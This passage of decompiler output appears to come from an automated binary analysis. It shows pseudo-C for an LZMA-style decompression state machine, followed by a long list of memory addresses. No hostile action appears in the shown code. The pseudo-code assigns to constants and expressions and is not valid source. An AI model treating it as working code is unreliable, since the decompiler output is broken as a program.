                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      												 *(__ebp - 0x48) = __eax;
                      												__eax = __eax + 1;
                      												__eax = __eax << 8;
                      												__eax = __eax + __ebx;
                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edx = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													 *(__ebp - 0x40) = 1;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													__ebx = __ebx + __ebx + 1;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edx;
                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L39;
                      												} else {
                      													goto L37;
                      												}
                      											case 0xe:
                      												L46:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xe;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t156 = __ebp - 0x70;
                      												 *_t156 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t156;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												while(1) {
                      													L48:
                      													__eflags = __ebx - 0x100;
                      													if(__ebx >= 0x100) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x58);
                      													__edx = __ebx + __ebx;
                      													__ecx =  *(__ebp - 0x10);
                      													__esi = __edx + __eax;
                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                      													__ax =  *__esi;
                      													 *(__ebp - 0x54) = __esi;
                      													__edi = __ax & 0x0000ffff;
                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      													__eflags =  *(__ebp - 0xc) - __ecx;
                      													if( *(__ebp - 0xc) >= __ecx) {
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      														__cx = __ax;
                      														_t170 = __edx + 1; // 0x1
                      														__ebx = _t170;
                      														__cx = __ax >> 5;
                      														__eflags = __eax;
                      														 *__esi = __ax;
                      													} else {
                      														 *(__ebp - 0x10) = __ecx;
                      														0x800 = 0x800 - __edi;
                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      														__ebx = __ebx + __ebx;
                      														 *__esi = __cx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														continue;
                      													} else {
                      														goto L46;
                      													}
                      												}
                      												L54:
                      												_t173 = __ebp - 0x34;
                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      												__eflags =  *_t173;
                      												goto L55;
                      											case 0xf:
                      												L58:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xf;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t203 = __ebp - 0x70;
                      												 *_t203 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t203;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L60:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													L55:
                      													__al =  *(__ebp - 0x44);
                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      													goto L56;
                      												}
                      												L61:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t217 = __edx + 1; // 0x1
                      													__ebx = _t217;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L60;
                      												} else {
                      													goto L58;
                      												}
                      											case 0x10:
                      												L109:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x10;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t365 = __ebp - 0x70;
                      												 *_t365 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t365;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												goto L111;
                      											case 0x11:
                      												L68:
                      												_t614 =  *(_t621 - 0x58);
                      												 *(_t621 - 0x84) = 0x12;
                      												while(1) {
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      											case 0x12:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 0x58);
                      													 *(__ebp - 0x84) = 0x13;
                      													__esi =  *(__ebp - 0x58) + 2;
                      													while(1) {
                      														L132:
                      														 *(_t621 - 0x54) = _t614;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												__eflags = __eax;
                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                      												goto L130;
                      											case 0x13:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													_t469 = __ebp - 0x58;
                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                      													__eflags =  *_t469;
                      													 *(__ebp - 0x30) = 0x10;
                      													 *(__ebp - 0x40) = 8;
                      													L144:
                      													 *(__ebp - 0x7c) = 0x14;
                      													goto L145;
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												 *(__ebp - 0x30) = 8;
                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      												L130:
                      												 *(__ebp - 0x58) = __eax;
                      												 *(__ebp - 0x40) = 3;
                      												goto L144;
                      											case 0x14:
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      												__eax =  *(__ebp - 0x80);
                      												 *(_t621 - 0x88) = _t542;
                      												goto L1;
                      											case 0x15:
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xb;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      												goto L120;
                      											case 0x16:
                      												__eax =  *(__ebp - 0x30);
                      												__eflags = __eax - 4;
                      												if(__eax >= 4) {
                      													_push(3);
                      													_pop(__eax);
                      												}
                      												__ecx =  *(__ebp - 4);
                      												 *(__ebp - 0x40) = 6;
                      												__eax = __eax << 7;
                      												 *(__ebp - 0x7c) = 0x19;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L145;
                      											case 0x17:
                      												L145:
                      												__eax =  *(__ebp - 0x40);
                      												 *(__ebp - 0x50) = 1;
                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      												goto L149;
                      											case 0x18:
                      												L146:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x18;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t484 = __ebp - 0x70;
                      												 *_t484 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t484;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L148:
                      												_t487 = __ebp - 0x48;
                      												 *_t487 =  *(__ebp - 0x48) - 1;
                      												__eflags =  *_t487;
                      												L149:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__ecx =  *(__ebp - 0x40);
                      													__ebx =  *(__ebp - 0x50);
                      													0 = 1;
                      													__eax = 1 << __cl;
                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      													__eax =  *(__ebp - 0x7c);
                      													 *(__ebp - 0x44) = __ebx;
                      													while(1) {
                      														 *(_t621 - 0x88) = _t542;
                      														goto L1;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x50);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      												__eax =  *(__ebp - 0x58);
                      												__esi = __edx + __eax;
                      												 *(__ebp - 0x54) = __esi;
                      												__ax =  *__esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													__cx = __ax >> 5;
                      													__eax = __eax - __ecx;
                      													__edx = __edx + 1;
                      													__eflags = __edx;
                      													 *__esi = __ax;
                      													 *(__ebp - 0x50) = __edx;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L148;
                      												} else {
                      													goto L146;
                      												}
                      											case 0x19:
                      												__eflags = __ebx - 4;
                      												if(__ebx < 4) {
                      													 *(__ebp - 0x2c) = __ebx;
                      													L119:
                      													_t393 = __ebp - 0x2c;
                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                      													__eflags =  *_t393;
                      													L120:
                      													__eax =  *(__ebp - 0x2c);
                      													__eflags = __eax;
                      													if(__eax == 0) {
                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      														goto L170;
                      													}
                      													__eflags = __eax -  *(__ebp - 0x60);
                      													if(__eax >  *(__ebp - 0x60)) {
                      														goto L171;
                      													}
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      													__eax =  *(__ebp - 0x30);
                      													_t400 = __ebp - 0x60;
                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      													__eflags =  *_t400;
                      													goto L123;
                      												}
                      												__ecx = __ebx;
                      												__eax = __ebx;
                      												__ecx = __ebx >> 1;
                      												__eax = __ebx & 0x00000001;
                      												__ecx = (__ebx >> 1) - 1;
                      												__al = __al | 0x00000002;
                      												__eax = (__ebx & 0x00000001) << __cl;
                      												__eflags = __ebx - 0xe;
                      												 *(__ebp - 0x2c) = __eax;
                      												if(__ebx >= 0xe) {
                      													__ebx = 0;
                      													 *(__ebp - 0x48) = __ecx;
                      													L102:
                      													__eflags =  *(__ebp - 0x48);
                      													if( *(__ebp - 0x48) <= 0) {
                      														__eax = __eax + __ebx;
                      														 *(__ebp - 0x40) = 4;
                      														 *(__ebp - 0x2c) = __eax;
                      														__eax =  *(__ebp - 4);
                      														__eax =  *(__ebp - 4) + 0x644;
                      														__eflags = __eax;
                      														L108:
                      														__ebx = 0;
                      														 *(__ebp - 0x58) = __eax;
                      														 *(__ebp - 0x50) = 1;
                      														 *(__ebp - 0x44) = 0;
                      														 *(__ebp - 0x48) = 0;
                      														L112:
                      														__eax =  *(__ebp - 0x40);
                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      															_t391 = __ebp - 0x2c;
                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      															__eflags =  *_t391;
                      															goto L119;
                      														}
                      														__eax =  *(__ebp - 0x50);
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      														__eax =  *(__ebp - 0x58);
                      														__esi = __edi + __eax;
                      														 *(__ebp - 0x54) = __esi;
                      														__ax =  *__esi;
                      														__ecx = __ax & 0x0000ffff;
                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      														__eflags =  *(__ebp - 0xc) - __edx;
                      														if( *(__ebp - 0xc) >= __edx) {
                      															__ecx = 0;
                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      															__ecx = 1;
                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      															__ebx = 1;
                      															__ecx =  *(__ebp - 0x48);
                      															__ebx = 1 << __cl;
                      															__ecx = 1 << __cl;
                      															__ebx =  *(__ebp - 0x44);
                      															__ebx =  *(__ebp - 0x44) | __ecx;
                      															__cx = __ax;
                      															__cx = __ax >> 5;
                      															__eax = __eax - __ecx;
                      															__edi = __edi + 1;
                      															__eflags = __edi;
                      															 *(__ebp - 0x44) = __ebx;
                      															 *__esi = __ax;
                      															 *(__ebp - 0x50) = __edi;
                      														} else {
                      															 *(__ebp - 0x10) = __edx;
                      															0x800 = 0x800 - __ecx;
                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      															 *__esi = __dx;
                      														}
                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                      														if( *(__ebp - 0x10) >= 0x1000000) {
                      															L111:
                      															_t368 = __ebp - 0x48;
                      															 *_t368 =  *(__ebp - 0x48) + 1;
                      															__eflags =  *_t368;
                      															goto L112;
                      														} else {
                      															goto L109;
                      														}
                      													}
                      													__ecx =  *(__ebp - 0xc);
                      													__ebx = __ebx + __ebx;
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      														__ecx =  *(__ebp - 0x10);
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      														__ebx = __ebx | 0x00000001;
                      														__eflags = __ebx;
                      														 *(__ebp - 0x44) = __ebx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L101:
                      														_t338 = __ebp - 0x48;
                      														 *_t338 =  *(__ebp - 0x48) - 1;
                      														__eflags =  *_t338;
                      														goto L102;
                      													} else {
                      														goto L99;
                      													}
                      												}
                      												__edx =  *(__ebp - 4);
                      												__eax = __eax - __ebx;
                      												 *(__ebp - 0x40) = __ecx;
                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      												goto L108;
                      											case 0x1a:
                      												L56:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1a;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x68);
                      												__al =  *(__ebp - 0x5c);
                      												__edx =  *(__ebp - 8);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *( *(__ebp - 0x68)) = __al;
                      												__ecx =  *(__ebp - 0x14);
                      												 *(__ecx +  *(__ebp - 8)) = __al;
                      												__eax = __ecx + 1;
                      												__edx = 0;
                      												_t192 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t192;
                      												goto L79;
                      											case 0x1b:
                      												L75:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1b;
                      													goto L170;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t274 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t274;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												_t283 = __ebp - 0x64;
                      												 *_t283 =  *(__ebp - 0x64) - 1;
                      												__eflags =  *_t283;
                      												 *( *(__ebp - 0x68)) = __cl;
                      												L79:
                      												 *(__ebp - 0x14) = __edx;
                      												goto L80;
                      											case 0x1c:
                      												while(1) {
                      													L123:
                      													__eflags =  *(__ebp - 0x64);
                      													if( *(__ebp - 0x64) == 0) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__edx =  *(__ebp - 8);
                      													__cl =  *(__eax + __edx);
                      													__eax =  *(__ebp - 0x14);
                      													 *(__ebp - 0x5c) = __cl;
                      													 *(__eax + __edx) = __cl;
                      													__eax = __eax + 1;
                      													__edx = 0;
                      													_t414 = __eax %  *(__ebp - 0x74);
                      													__eax = __eax /  *(__ebp - 0x74);
                      													__edx = _t414;
                      													__eax =  *(__ebp - 0x68);
                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      													__eflags =  *(__ebp - 0x30);
                      													 *( *(__ebp - 0x68)) = __cl;
                      													 *(__ebp - 0x14) = _t414;
                      													if( *(__ebp - 0x30) > 0) {
                      														continue;
                      													} else {
                      														L80:
                      														 *(__ebp - 0x88) = 2;
                      														goto L1;
                      													}
                      												}
                      												 *(__ebp - 0x88) = 0x1c;
                      												goto L170;
                      										}
                      									}
                      									L171:
                      									_t544 = _t543 | 0xffffffff;
                      									goto L172;
                      								}
                      							}
                      						}
                      					}
                      					goto L1;
                      				}
                      			}














                      0x00000000
                      0x00406ffe
                      0x00406ffe
                      0x00407002
                      0x00407023
                      0x0040702a
                      0x00407030
                      0x00407036
                      0x00407048
                      0x0040704e
                      0x00407053
                      0x00000000
                      0x00407004
                      0x0040700a
                      0x004073cb
                      0x004073cb
                      0x004073cb
                      0x004073ce
                      0x004073ce
                      0x004073ce
                      0x004073d4
                      0x004073da
                      0x004073e0
                      0x004073fa
                      0x004073fd
                      0x00407403
                      0x0040740e
                      0x00407410
                      0x004073e2
                      0x004073e2
                      0x004073f1
                      0x004073f5
                      0x004073f5
                      0x0040741a
                      0x00000000
                      0x00000000
                      0x0040741c
                      0x00407420
                      0x004075cf
                      0x004075e5
                      0x004075ed
                      0x004075f4
                      0x004075f6
                      0x004075fd
                      0x00407601
                      0x00407601
                      0x0040742c
                      0x00407433
                      0x0040743b
                      0x0040743e
                      0x00407441
                      0x00407441
                      0x00407447
                      0x00407447
                      0x00406be3
                      0x00406be3
                      0x00406be3
                      0x00406bec
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x00000000
                      0x00406bfd
                      0x00000000
                      0x00000000
                      0x00406c06
                      0x00406c09
                      0x00406c0c
                      0x00406c10
                      0x00000000
                      0x00000000
                      0x00406c16
                      0x00406c19
                      0x00406c1b
                      0x00406c1c
                      0x00406c1f
                      0x00406c21
                      0x00406c22
                      0x00406c24
                      0x00406c27
                      0x00406c2c
                      0x00406c31
                      0x00406c3a
                      0x00406c4d
                      0x00406c50
                      0x00406c5c
                      0x00406c84
                      0x00406c86
                      0x00406c94
                      0x00406c94
                      0x00406c98
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406c88
                      0x00406c88
                      0x00406c8b
                      0x00406c8c
                      0x00406c8c
                      0x00000000
                      0x00406c88
                      0x00406c62
                      0x00406c67
                      0x00406c67
                      0x00406c70
                      0x00406c78
                      0x00406c7b
                      0x00000000
                      0x00406c81
                      0x00406c81
                      0x00000000
                      0x00406c81
                      0x00000000
                      0x00406c9e
                      0x00406c9e
                      0x00406ca2
                      0x0040754e
                      0x00000000
                      0x0040754e
                      0x00406cab
                      0x00406cbb
                      0x00406cbe
                      0x00406cc1
                      0x00406cc1
                      0x00406cc1
                      0x00406cc4
                      0x00406cc8
                      0x00000000
                      0x00000000
                      0x00406cca
                      0x00406cd0
                      0x00406cfa
                      0x00406d00
                      0x00406d07
                      0x00000000
                      0x00406d07
                      0x00406cd6
                      0x00406cd9
                      0x00406cde
                      0x00406cde
                      0x00406ce9
                      0x00406cf1
                      0x00406cf4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406d39
                      0x00406d3f
                      0x00406d42
                      0x00406d4f
                      0x00406d57
                      0x00000000
                      0x00000000
                      0x00406d0e
                      0x00406d0e
                      0x00406d12
                      0x0040755d
                      0x00000000
                      0x0040755d
                      0x00406d1e
                      0x00406d29
                      0x00406d29
                      0x00406d29
                      0x00406d2c
                      0x00406d2f
                      0x00406d32
                      0x00406d37
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004073ce
                      0x004073ce
                      0x004073d4
                      0x004073da
                      0x004073e0
                      0x004073fa
                      0x004073fd
                      0x00407403
                      0x0040740e
                      0x00407410
                      0x004073e2
                      0x004073e2
                      0x004073f1
                      0x004073f5
                      0x004073f5
                      0x0040741a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406d5f
                      0x00406d61
                      0x00406d64
                      0x00406dd5
                      0x00406dd8
                      0x00406ddb
                      0x00406de2
                      0x00406dec
                      0x004073cb
                      0x004073cb
                      0x00000000
                      0x004073cb
                      0x00406d66
                      0x00406d6a
                      0x00406d6d
                      0x00406d6f
                      0x00406d72
                      0x00406d75
                      0x00406d77
                      0x00406d7a
                      0x00406d7c
                      0x00406d81
                      0x00406d84
                      0x00406d87
                      0x00406d8b
                      0x00406d92
                      0x00406d95
                      0x00406d9c
                      0x00406da0
                      0x00406da8
                      0x00406da8
                      0x00406da8
                      0x00406da2
                      0x00406da2
                      0x00406da2
                      0x00406d97
                      0x00406d97
                      0x00406d97
                      0x00406dac
                      0x00406daf
                      0x00406dcd
                      0x00406dcf
                      0x00000000
                      0x00406db1
                      0x00406db1
                      0x00406db4
                      0x00406db7
                      0x00406dba
                      0x00406dbc
                      0x00406dbc
                      0x00406dbc
                      0x00406dbf
                      0x00406dc2
                      0x00406dc4
                      0x00406dc5
                      0x00406dc8
                      0x00000000
                      0x00406dc8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00407068
                      0x0040706c
                      0x0040708f
                      0x00407092
                      0x00407095
                      0x0040709f
                      0x0040706e
                      0x0040706e
                      0x00407071
                      0x00407074
                      0x00407077
                      0x00407084
                      0x00407087
                      0x00407087
                      0x004073cb
                      0x004073cb
                      0x004073cb
                      0x00000000
                      0x004073cb
                      0x00000000
                      0x004070ab
                      0x004070af
                      0x00000000
                      0x00000000
                      0x004070b5
                      0x004070b9
                      0x00000000
                      0x00000000
                      0x004070bf
                      0x004070c1
                      0x004070c5
                      0x004070c5
                      0x004070c8
                      0x004070cc
                      0x00000000
                      0x00000000
                      0x0040711c
                      0x00407120
                      0x00407127
                      0x0040712a
                      0x0040712d
                      0x00407137
                      0x004073cb
                      0x004073cb
                      0x004073cb
                      0x00000000
                      0x004073cb
                      0x004073cb
                      0x00407122
                      0x00000000
                      0x00000000
                      0x00407143
                      0x00407147
                      0x0040714e
                      0x00407151
                      0x00407154
                      0x00407149
                      0x00407149
                      0x00407149
                      0x00407157
                      0x0040715a
                      0x0040715d
                      0x0040715d
                      0x00407160
                      0x00407163
                      0x00407166
                      0x00407166
                      0x00407169
                      0x00407170
                      0x00407175
                      0x00000000
                      0x00000000
                      0x00407203
                      0x00407203
                      0x00407207
                      0x004075a5
                      0x00000000
                      0x004075a5
                      0x0040720d
                      0x00407210
                      0x00407213
                      0x00407217
                      0x0040721a
                      0x00407220
                      0x00407222
                      0x00407222
                      0x00407222
                      0x00407225
                      0x00407228
                      0x00000000
                      0x00000000
                      0x00406df8
                      0x00406df8
                      0x00406dfc
                      0x00407569
                      0x00000000
                      0x00407569
                      0x00406e02
                      0x00406e05
                      0x00406e08
                      0x00406e0c
                      0x00406e0f
                      0x00406e15
                      0x00406e17
                      0x00406e17
                      0x00406e17
                      0x00406e1a
                      0x00406e1d
                      0x00406e1d
                      0x00406e20
                      0x00406e23
                      0x00000000
                      0x00000000
                      0x00406e29
                      0x00406e2f
                      0x00000000
                      0x00000000
                      0x00406e35
                      0x00406e35
                      0x00406e39
                      0x00406e3c
                      0x00406e3f
                      0x00406e42
                      0x00406e45
                      0x00406e46
                      0x00406e49
                      0x00406e4b
                      0x00406e51
                      0x00406e54
                      0x00406e57
                      0x00406e5a
                      0x00406e5d
                      0x00406e60
                      0x00406e63
                      0x00406e7f
                      0x00406e82
                      0x00406e85
                      0x00406e88
                      0x00406e8f
                      0x00406e93
                      0x00406e95
                      0x00406e99
                      0x00406e65
                      0x00406e65
                      0x00406e69
                      0x00406e71
                      0x00406e76
                      0x00406e78
                      0x00406e7a
                      0x00406e7a
                      0x00406e9c
                      0x00406ea3
                      0x00406ea6
                      0x00000000
                      0x00406eac
                      0x00000000
                      0x00406eac
                      0x00000000
                      0x00406eb1
                      0x00406eb1
                      0x00406eb5
                      0x00407575
                      0x00000000
                      0x00407575
                      0x00406ebb
                      0x00406ebe
                      0x00406ec1
                      0x00406ec5
                      0x00406ec8
                      0x00406ece
                      0x00406ed0
                      0x00406ed0
                      0x00406ed0
                      0x00406ed3
                      0x00406ed6
                      0x00406ed6
                      0x00406ed6
                      0x00406edc
                      0x00000000
                      0x00000000
